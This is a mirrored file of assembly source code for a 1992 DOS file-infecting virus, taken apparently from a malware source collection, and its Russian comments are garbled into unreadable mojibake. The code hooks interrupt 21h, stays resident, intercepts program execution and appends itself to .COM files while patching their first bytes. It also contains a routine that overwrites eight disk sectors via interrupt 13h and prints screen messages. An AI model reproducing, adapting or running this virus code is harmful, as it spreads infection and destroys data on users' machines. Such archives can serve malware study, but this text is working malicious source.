mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
394 lines
15 KiB
NASM
394 lines
15 KiB
NASM
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>⪮<EFBFBD><E2AAAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ⮫쪮 <20><>⮬ <20><><EFBFBD>ᬠ<EFBFBD>ਢ<EFBFBD><E0A8A2><EFBFBD>
|
|||
|
; source code. (<28><><EFBFBD> ࠢ<><E0A0A2> <20><><EFBFBD> <20> <20><><EFBFBD> ࠧ<><E0A0A7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ਤ<EFBFBD><E0A8A4><EFBFBD><EFBFBD> :-)).
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>쪠<EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD>쪠<EFBFBD>) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><>৮<EFBFBD><E0A7AE><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD>, ⨭<E1AAAE>...
|
|||
|
;
|
|||
|
; <20> <20><>饬, <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD> <20><>直<EFBFBD> ⠬ 䠩<><E4A0A9> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>⪥ <20><>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> - <20><><EFBFBD><EFBFBD> <20> 䠬<><E4A0AC><EFBFBD><EFBFBD><EFBFBD> .COM, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><> <20><> <20><>ठ<EFBFBD><E0A4A0> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; 21-<2D><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0A0AF>, <20><> <20><><EFBFBD>뢠<EFBFBD><EBA2A0> <> ⥫<> <20><>୮<EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>ਪ<EFBFBD><E0A8AA><EFBFBD> (⠪<><E2A0AA> ⨯<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>窨, <20>ᯮ<EFBFBD><E1AFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>த<EFBFBD><E0AEA4> <20><><EFBFBD> <20><>ᥪ<EFBFBD><E1A5AA><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD>-祣<> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <><E1A2AE><EFBFBD>), <20><>ᯮ<EFBFBD><E1AFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> 4-<2D><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>砫<EFBFBD>, <20> <> <20><><EFBFBD><EFBFBD>稥 <20>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> ⠪: <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> AX <><E1ABAE> BABA (<28> <20><><EFBFBD>, <20><> ⠪<><E2A0AA>
|
|||
|
; <><E1ABAE>, <20> word 0BABAh), <20>믮<EFBFBD><EBAFAE><EFBFBD><EFBFBD><EFBFBD> 21-<2D> <20><><EFBFBD><EFBFBD><EFBFBD>⮢<E0A0AF><E2AEA2><EFBFBD><EFBFBD> <20> ᬮ<><E1ACAE><EFBFBD><EFBFBD>,
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> 0FACCh. <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20> <20><>窮<EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>⭮.
|
|||
|
;
|
|||
|
; Copyright (c) 1992, Gogi&Givi International
|
|||
|
;
|
|||
|
|
|||
|
jumps
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 0100h
|
|||
|
VirPar equ (endvir-StartVirus)/16+2 ; <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࠣ<EFBFBD><E0A0A3>䮢
|
|||
|
VirLen equ (endvir-StartVirus) ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>
|
|||
|
; <20><><EFBFBD>㣮<EFBFBD><E3A3AE><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
gadost:
|
|||
|
db '<27>' ; <20><><EFBFBD> <20><><EFBFBD> CALL
|
|||
|
dw StartVirus-$-2 ; <20> <20><><EFBFBD> ᬥ饭<E1ACA5><E9A5AD> <20><> StartVirus
|
|||
|
db 15,09h ; <20><>ਪ<EFBFBD><E0A8AA> <20> <20><><EFBFBD><EFBFBD>⮪ <20><> mov ah,
|
|||
|
int 21h ; <20> <20><><EFBFBD> <20><><EFBFBD> <20><>ଠ<EFBFBD><E0ACA0><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
ret ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
GoodMessage db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>᪨<EFBFBD>! <20><><EFBFBD> <20>!',13,10,'$'
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ᠤ<EFBFBD> <20><><EFBFBD> <20>廊
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E1AAAE>
|
|||
|
StartVirus:
|
|||
|
pop si ; <20><><EFBFBD> <20>⮡<EFBFBD> 㧭<><E3A7AD><EFBFBD>, <20>㤠 <20><><EFBFBD>
|
|||
|
call EntryPoint ; <20><><EFBFBD><EFBFBD>
|
|||
|
EntryPoint:
|
|||
|
pop si ; <20>믨孥<EBAFA8> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>砫<EFBFBD> <20><>ࠧ<EFBFBD>
|
|||
|
push ds ; <20><><EFBFBD>࠭<EFBFBD><E0A0AD> <20><><EFBFBD><EFBFBD>-<2D>ன<EFBFBD><E0AEA9> ॣ<><E0A5A3><EFBFBD>...
|
|||
|
push es
|
|||
|
push si
|
|||
|
mov ax,cs ; <20><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD> ᯥ<><E1AFA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov es,ax ; <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>
|
|||
|
mov ds,ax
|
|||
|
mov di,0100h
|
|||
|
add si,RobbedBytes-EntryPoint
|
|||
|
mov cx,4
|
|||
|
cld ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
rep movsb
|
|||
|
pop si
|
|||
|
mov ax,0ABABh ; <20><EFBFBD>ਬ, <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> -
|
|||
|
int 21h ; <20> <20><><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><> <20><>
|
|||
|
cmp ax,0FAAFh ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jne NeedsBaba ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD> <20><>, த<><E0AEA4><EFBFBD><EFBFBD>!
|
|||
|
jmp FucksNow ; <20><> 㦥 <20><>ࠡ<EFBFBD><E0A0A1>뢠<EFBFBD><EBA2A0>
|
|||
|
NeedsBaba:
|
|||
|
pop es
|
|||
|
push es
|
|||
|
mov ax,es ; <20><><EFBFBD>뢠<EFBFBD><EBA2A0> ᥡ<> <20><EFBFBD><EEA3AC><EFBFBD> PSP
|
|||
|
dec ax
|
|||
|
mov es,ax ; <20>⮫쪮 <20> <20><>襩 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov ax,es:[3] ; <20><>ࠣ<EFBFBD><E0A0A3>䮢
|
|||
|
sub ax,virpar
|
|||
|
mov es:[3],ax
|
|||
|
mov bx,es:[1] ; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> PSP
|
|||
|
add bx,ax ; <20><><EFBFBD> ᢠ<><E1A2A0><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
|
|||
|
mov es,bx
|
|||
|
push ds ; <20><>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD>⭮
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov ax,ds:[21h*4] ; <20><>墠<EFBFBD>뢠<EFBFBD><EBA2A0> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov cs:[si+Off21-EntryPoint],ax ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> int 21h
|
|||
|
mov ax,ds:[21h*4+2] ; <20> <20><><EFBFBD>, <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,
|
|||
|
mov cs:[si+Seg21-EntryPoint],ax ; <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
pop ds
|
|||
|
xor di,di ; <20><>ᮢ뢠<E1AEA2><EBA2A0> <20> <20><>砫<EFBFBD>
|
|||
|
push si ; <20><>祩<EFBFBD><E7A5A9><EFBFBD><EFBFBD> ᥣ<><E1A5A3><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
sub si,EntryPoint-StartVirus ; <20><><EFBFBD>-<2D><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>ઠ<EFBFBD>
|
|||
|
mov cx,VirLen ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD>᭮<EFBFBD>
|
|||
|
rep movsb ; ⥫<>
|
|||
|
pop si
|
|||
|
push ds ; <20> <20>⠢<EFBFBD><E2A0A2> <20><> 㪠<><E3AAA0><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
xor ax,ax ; <20><><EFBFBD>᭮<EFBFBD> ⥫<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov ds,ax ; <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD> 21h
|
|||
|
mov word ptr ds:[21h*4],Int21Server-StartVirus
|
|||
|
mov ds:[21h*4+2],es
|
|||
|
pop ds
|
|||
|
|
|||
|
FucksNow:
|
|||
|
pop es ; <20><><EFBFBD> <20> <20><><EFBFBD>砥, <20>
|
|||
|
pop ds ; <20>।<EFBFBD><E0A5A4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>騭<EFBFBD><E9A8AD>
|
|||
|
mov si,0100h ; (<28><><EFBFBD><EFBFBD>ᮬ) 㦥 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push si
|
|||
|
xor ax,ax ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>
|
|||
|
xor bx,bx ; <20><>७<EFBFBD> <20><><EFBFBD><EFBFBD> - <20> <20><><EFBFBD><EFBFBD><EFBFBD>,
|
|||
|
xor di,di ; <20> <20><><EFBFBD><EFBFBD>
|
|||
|
ret
|
|||
|
|
|||
|
Int21Server:
|
|||
|
pushf ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>ࠡ<EFBFBD><E0A0A1>稪
|
|||
|
push ax ; 21-<2D><> <20><><EFBFBD><EFBFBD>
|
|||
|
push bx
|
|||
|
push ds
|
|||
|
cmp ax,0ABABh ; <20><><EFBFBD> <20><> <20><>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD> ॠ<><E0A5A0><EFBFBD><EFBFBD>
|
|||
|
jne NotTest ; <20><> <20>।<EFBFBD><E0A5A4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>騭<EFBFBD>
|
|||
|
pop ds ; (<28><><EFBFBD> <20>४<EFBFBD><E0A5AA><EFBFBD>)
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
mov ax,0FAAFh ; <20><><EFBFBD> <20><>ଠ<EFBFBD>쭠<EFBFBD> <20>४<EFBFBD><E0A5AA><EFBFBD>
|
|||
|
iret ; (<28><> <20><><EFBFBD><EFBFBD> ॠ<><E0A5A0><EFBFBD><EFBFBD>)
|
|||
|
|
|||
|
NotTest:
|
|||
|
push cx ; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>᭮ <20><><EFBFBD><EFBFBD><EFBFBD>⨬<EFBFBD><E2A8AC>,
|
|||
|
mov cx,ax ; <20>⮡<EFBFBD> ᤥ<><E1A4A5><EFBFBD><EFBFBD> <20><><EFBFBD>, <20><><EFBFBD>
|
|||
|
xchg cl,ch ; <20><><EFBFBD> ᮢᥬ <20><> <20>㦭<EFBFBD>
|
|||
|
xor cl,4Bh ; <20><>ࠡ<EFBFBD><E0A0A1>뢠<EFBFBD><EBA2A0> <20>㭪<EFBFBD><E3ADAA><EFBFBD> EXEC
|
|||
|
pop cx ; (<28>⮡ <20><><EFBFBD><EFBFBD><EFBFBD>᪨<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jz Exec ; <20> <20>⮡ <20> <20><><EFBFBD><EFBFBD> <20>窨 <20><><EFBFBD><EFBFBD>⥫<EFBFBD>)
|
|||
|
jmp NotExec
|
|||
|
|
|||
|
Exec:
|
|||
|
mov bx,dx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ᬥ饭<E1ACA5><E9A5AD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD>᪠<EFBFBD><E1AAA0><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9> <20> BX
|
|||
|
SearchZero:
|
|||
|
cmp byte ptr ds:[bx],0 ; <20><EFBFBD>ਬ <20><> <20><><EFBFBD><EFBFBD>
|
|||
|
je ZeroFound ; <20><>, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
inc bx
|
|||
|
jmp SearchZero
|
|||
|
|
|||
|
ZeroFound:
|
|||
|
sub bx,11 ; <20>㤥᭮!
|
|||
|
push es ; <20><EFBFBD>ਬ, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>-
|
|||
|
mov ax,cs ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov es,ax ; <20><>ࠧ<EFBFBD><E0A0A7><EFBFBD> COMMAND.COM
|
|||
|
mov cx,11
|
|||
|
mov di,offset CommandName-StartVirus
|
|||
|
|
|||
|
Compare:
|
|||
|
mov al,ds:[bx] ; <20><><EFBFBD> <20><><EFBFBD> <><E1ABAE><EFBFBD><EFBFBD> <20> <20>㤭<EFBFBD><E3A4AD>
|
|||
|
cmp al,es:[di] ; <20><><EFBFBD>楤<EFBFBD><E6A5A4><EFBFBD> <20><EFBFBD>ન...
|
|||
|
jne NotCommand
|
|||
|
inc bx
|
|||
|
inc di
|
|||
|
dec cx ; <20><><EFBFBD> <20><EFBFBD><E0AEA2>塞, <20><EFBFBD><E0AEA2>塞...
|
|||
|
cmp cx,0
|
|||
|
jne Compare
|
|||
|
pop es
|
|||
|
jmp Quit21Server ; <20><><EFBFBD> <20> <20> - <20><><EFBFBD><EFBFBD><EFBFBD> COMMAND.COM
|
|||
|
; <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD>?!
|
|||
|
NotCommand:
|
|||
|
pop es ; <20><><EFBFBD> <20><> <20><><EFBFBD>࠭ 祣<><E7A5A3>-<2D><>
|
|||
|
push ax
|
|||
|
push bx ; <20><><EFBFBD>࠭<EFBFBD><E0A0AD> <20><><EFBFBD>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push cx ; <20><><EFBFBD><EFBFBD><EFBFBD>, <20>⮡<EFBFBD> <20><> <20>ய<EFBFBD><E0AEAF><EFBFBD>
|
|||
|
push dx
|
|||
|
mov ax,3D02h ; <20><><EFBFBD>㯮ਢ<E3AFAE><E0A8A2><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (䠩<>)
|
|||
|
int 21h
|
|||
|
jc EndExec1 ; <20>뢠<EFBFBD><EBA2A0> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA1>
|
|||
|
mov bx,ax ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA1> <20><> 䠩<><E4A0A9> <20> BX
|
|||
|
mov cx,4 ; <20><>⥫<EFBFBD><E2A5AB><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 4 <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov ax,cs
|
|||
|
mov ds,ax
|
|||
|
mov ah,3Fh ; <20> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov dx,offset RobbedBytes-StartVirus
|
|||
|
int 21h ; ᯥ<><E1AFA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jc EndExec1
|
|||
|
cmp word ptr cs:[RobbedBytes-StartVirus],'ZM'
|
|||
|
je CloseFile ; <20><> 䨣<> EXE <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD>???
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
mov ax,4202h
|
|||
|
int 21h ; <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>
|
|||
|
cmp ax,1000 ; <20><> 䨣<> <20><><EFBFBD> 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jl CloseFile ; 1 <20><><EFBFBD><EFBFBD>?
|
|||
|
cmp ax,64000 ; <20> ⥬ <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 64
|
|||
|
ja CloseFile
|
|||
|
sub ax,3
|
|||
|
mov cs:[FileSize-StartVirus],ax ; <20><>ਪ<EFBFBD><E0A8AA><EFBFBD> ?
|
|||
|
cmp byte ptr cs:[RobbedBytes-StartVirus+3],15
|
|||
|
je CloseFile ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
mov ax,cs
|
|||
|
mov ds,ax
|
|||
|
mov ah,40h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <><E0AEA1> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
xor dx,dx ; ⥫<> <20><>୮<EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>
|
|||
|
mov cx,VirLen
|
|||
|
int 21h
|
|||
|
xor cx,cx ; <20> <20> <20><>砫<EFBFBD> 㡥<><E3A1A5><EFBFBD><EFBFBD>, <20>⮡<EFBFBD>
|
|||
|
xor dx,dx ; JUMP <20>㤠 <20><><EFBFBD>⠢<EFBFBD><E2A0A2><EFBFBD>
|
|||
|
mov ax,4200h
|
|||
|
int 21h
|
|||
|
mov ah,40h
|
|||
|
mov dx,offset SuperByte-StartVirus ; <20><><EFBFBD><EFBFBD> <20><> <20><> <20> 䠩<>, <20>⮡<EFBFBD>
|
|||
|
mov cx,4 ; <20><><EFBFBD>뢠<EFBFBD><EBA2A0> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
int 21h ; ᧠<><E1A7A0> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jmp CloseFile
|
|||
|
|
|||
|
EndExec1: jmp EndExec
|
|||
|
|
|||
|
mess1: db 'Hi! hello from MSS!',0dh,0ah,'$'
|
|||
|
str1 db ' HELLO FROM OVER1 ','$'
|
|||
|
|
|||
|
game: mov al,0 ; <20><><EFBFBD><EFBFBD>ᨬ <20> <20><><EFBFBD><EFBFBD>稪 0
|
|||
|
mov [count-0124h],al
|
|||
|
mov ax,0308h ; <20> AL - 8 ᥪ<><E1A5AA>
|
|||
|
mov bx,offset endvir ; <20> BX - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> 墮<>⮬
|
|||
|
mov dx,0000h
|
|||
|
mov cx,0001h
|
|||
|
int 13h ; <20><>襬 <20><> <20><><EFBFBD><EFBFBD> <20> 8 ᥪ<><E1A5AA>
|
|||
|
jmp eee ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>塞.
|
|||
|
CloseFile:
|
|||
|
mov ah,3Eh ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>⨥ 䠩<><E4A0A9> - <20><><EFBFBD>
|
|||
|
int 21h ; <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20>㦥<EFBFBD>
|
|||
|
|
|||
|
push ds ; <20><><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
; mov al,[count-0124h] ; <20> 砢<> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD>稪<EFBFBD>?
|
|||
|
; inc al ; <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> +1 ?
|
|||
|
; mov [count-0124h],al ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>...
|
|||
|
; cmp al,02h ; <20><>, 㦥 14 <20><>㯮<EFBFBD>?
|
|||
|
; jl eee ; <20><><EFBFBD>? <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>...
|
|||
|
mov ah,09 ; Fuck'<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>...
|
|||
|
mov dx,offset mess1-0124h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,0 ;
|
|||
|
mov al,0 ; <20><>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0 <20><><EFBFBD><EFBFBD><EFBFBD>०<EFBFBD><E0A5A6>
|
|||
|
int 10h ;
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov bh,0
|
|||
|
mov dh,0
|
|||
|
mov dl,10
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> 0,10
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov al,201
|
|||
|
mov bl,01000010b
|
|||
|
mov bh,0
|
|||
|
mov cx,1
|
|||
|
int 10h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>᭮<EFBFBD> '<27>' <20> <20><><EFBFBD><EFBFBD>樨 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov bh,0
|
|||
|
mov dh,0
|
|||
|
mov dl,11
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><> 0,11
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov al,205
|
|||
|
mov bl,01000010b
|
|||
|
mov bh,0
|
|||
|
mov cx,20
|
|||
|
int 10h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> 20 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>᭮<EFBFBD> '<27>'
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov bh,0
|
|||
|
mov dh,0
|
|||
|
mov dl,31
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><> 0,31
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov al,187
|
|||
|
mov bl,01000010b
|
|||
|
mov bh,0
|
|||
|
mov cx,1
|
|||
|
int 10h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> '<27>'
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov bh,0
|
|||
|
mov dh,1
|
|||
|
mov dl,10
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><> 1,10
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov bl,01000010b
|
|||
|
mov al,186
|
|||
|
mov bh,0
|
|||
|
mov cx,1
|
|||
|
int 10h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> '<27>'
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov dx,010bh
|
|||
|
int 10h
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov dx,offset str1
|
|||
|
int 21h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> <20>ਢ<EFBFBD><E0A8A2><EFBFBD>⢨<EFBFBD> 'str1'
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov bh,0
|
|||
|
mov dh,1
|
|||
|
mov dl,31
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><> 1,31
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov al,186
|
|||
|
mov bl,01000010b
|
|||
|
mov bh,0
|
|||
|
mov cx,1
|
|||
|
int 10h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> '<27>'
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov dh,2
|
|||
|
mov dl,31
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><> 2,31
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov al,188
|
|||
|
mov bl,01000010b
|
|||
|
mov bh,0
|
|||
|
mov cx,1
|
|||
|
int 10h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> '<27>'
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov dh,2
|
|||
|
mov dl,10
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><> 3,10
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov al,200
|
|||
|
mov bl,01000010b
|
|||
|
mov bh,0
|
|||
|
mov cx,1
|
|||
|
int 10h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> '<27>'
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov dh,2
|
|||
|
mov dl,11
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><> 2,11
|
|||
|
|
|||
|
mov ah,9
|
|||
|
mov al,205
|
|||
|
mov bl,01000010b
|
|||
|
mov bh,0
|
|||
|
